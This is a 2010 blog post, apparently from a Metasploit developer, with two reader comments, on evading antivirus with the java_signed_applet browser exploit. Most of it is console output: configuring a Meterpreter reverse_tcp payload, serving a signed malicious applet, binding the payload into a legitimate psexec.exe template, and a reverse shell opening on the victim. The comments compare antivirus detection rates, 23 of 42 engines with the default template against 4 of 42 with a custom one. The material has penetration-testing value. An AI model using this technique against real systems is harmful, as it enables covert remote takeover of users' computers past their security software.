Wednesday, March 31, 2010

java_signed_applet AV Detection

(Sorry for the wonky spacing below. I seem to have forgotten how to best display code in Blogger.)

Any module in metasploit that generates and drops an executable uses the Msf::Util::EXE.to_win32pe function. This is the same function used by ./msfpayload to generate Windows executables, and takes a number of options which are usually not exposed via the exploit module and therefore can't easily be modified during an exploit run using ./msfconsole.

As of r8966, multi/browser/java_signed_applet now exposes these options to help evade antivirus detection.

When using a default exploit run, this is what you will see:

nathan@polaris:/pentest/exploits/msf3-commit$ ./msfconsole

_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 538 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)

msf exploit(java_signed_applet) > set URIPATH /
URIPATH => /
msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set LHOST 10.10.10.43
LHOST => 10.10.10.43
msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
msf exploit(java_signed_applet) >
[*] Started reverse handler on 10.10.10.43:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.10.10.43:8080/
[*] Server started.

msf exploit(java_signed_applet) >
[*] Handling request from 10.10.10.102:5822...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed. Building jar file...
[*] Jar built. Signing...
[*] Jar signed. Ready to send.

At this point, McAfee or what have you just popped up on the target laptop, blocking the default generated exe.

For a quick background, executable generation in metasploit uses a template.exe file by default that is kept in the msf/data/templates/ directory. This is a dummy exe that is merely used for a framework around the payload we actually want to execute. As of the last exec overhaul, this exe can now be virtually any Windows executable that has enough space inside it to allow the msf payload to be sliced in.

Additionally, as of r8896, executables can now act as a binder, where the payload is spawned as a new thread of the executable and will run in the background while the original executable executes. This is the new :insert option added to Msf::Util::EXE.to_win32pe.

Now, by modifying the default :template option (via the 'Template' Advanced Option), we can evade almost all AV.

nathan@polaris:/tmp$ wget http://download.sysinternals.com/Files/PsTools.zip
--2010-03-31 17:21:26-- http://download.sysinternals.com/Files/PsTools.zip
Resolving download.sysinternals.com... 207.46.140.23
Connecting to download.sysinternals.com|207.46.140.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1380351 (1.3M) [application/x-zip-compressed]
Saving to: `PsTools.zip'

100%[===================================================================================================================>] 1,380,351 408K/s in 3.3s

2010-03-31 17:21:29 (408 KB/s) - `PsTools.zip' saved [1380351/1380351]

nathan@polaris:/tmp$ mkdir pstools && mv PsTools.zip pstools && cd pstools && unzip PsTools.zip
Archive: PsTools.zip
inflating: psexec.exe
inflating: psfile.exe
inflating: psgetsid.exe
inflating: Psinfo.exe
inflating: pskill.exe
inflating: pslist.exe
inflating: psloggedon.exe
inflating: psloglist.exe
inflating: pspasswd.exe
inflating: psservice.exe
inflating: psshutdown.exe
inflating: pssuspend.exe
inflating: Pstools.chm
extracting: psversion.txt
inflating: pdh.dll
inflating: Eula.txt
nathan@polaris:/tmp/pstools$ cd $MSF
nathan@polaris:/pentest/exploits/msf3-commit$ ./msfconsole

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 538 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)

msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set LHOST 10.10.10.43
LHOST => 10.10.10.43
msf exploit(java_signed_applet) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
AppletName SiteLoader yes The main applet's class name.
CertCN Metasploit Inc. yes The CN= value for the certificate.
PayloadName SiteSupport yes The payload classes name.
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 10.10.10.43 yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
1 Windows x86 (Native Payload)


msf exploit(java_signed_applet) > set URIPATH /
URIPATH => /
msf exploit(java_signed_applet) > show advanced

Module advanced options:

Name : AddClassPath
Current Setting:
Description : Additional java classpath

Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information

Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload

Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads

Name : InsertPayload
Current Setting:
Description : Inject payload into template without affecting executable
behavior

Name : JavaCache
Current Setting: /home/nathan/.msf3/javacache
Description : Java cache location

Name : SaveToFile
Current Setting:
Description : When set, source is saved to this directory under
external/source/

Name : Template
Current Setting: /pentest/exploits/msf3-commit/data/templates/template.exe
Description : The default executable template to use

Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module



Payload advanced options (windows/meterpreter/reverse_tcp):

Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension

Name : AutoRunScript
Current Setting:
Description : A script to automatically on session creation.

Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.

Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session created (before
AutoRunScript)

Name : ReverseConnectRetries
Current Setting: 5
Description : The number of connection attempts to try before exiting the
process

Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module


msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe
Template => /tmp/pstools/psexec.exe
msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
msf exploit(java_signed_applet) >
[*] Started reverse handler on 10.10.10.43:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.10.10.43:8080/
[*] Server started.

msf exploit(java_signed_applet) >
[*] Handling request from 10.10.10.102:5805...
[*] Generated executable to drop (381304 bytes).
[*] Compiling applet classes...
[*] Compile completed. Building jar file...
[*] Jar built. Signing...
[*] Jar signed. Ready to send.
[*] Sending SiteLoader.jar to 10.10.10.102:5806. Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 10.10.10.102:5806. Waiting for user to click 'accept'...
[*] Sending stage (748032 bytes) to 10.10.10.102
[*] Meterpreter session 1 opened (10.10.10.43:4444 -> 10.10.10.102:5807)

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getpid
Current pid: 4284
meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(java_signed_applet) > exit

[*] Server stopped.

2 comments:

Nicolas Krassas, CISSP said...

It has the same detection rate as making a template with msfencode. Quite a few of antiviruses are detection it.

natron said...

By using the default template:

Result: 23/42 (54.77%)

Includes all major AV players.


By using your own .exe via the Template advanced option:

Result 4/42 (9.53%)

Includes Microsoft, NOD32, Sophos, and Symantec.

At least one of those is detecting it because I used psexec.exe as my exe, and possibly more.

My bet is you didn't follow the directions. :)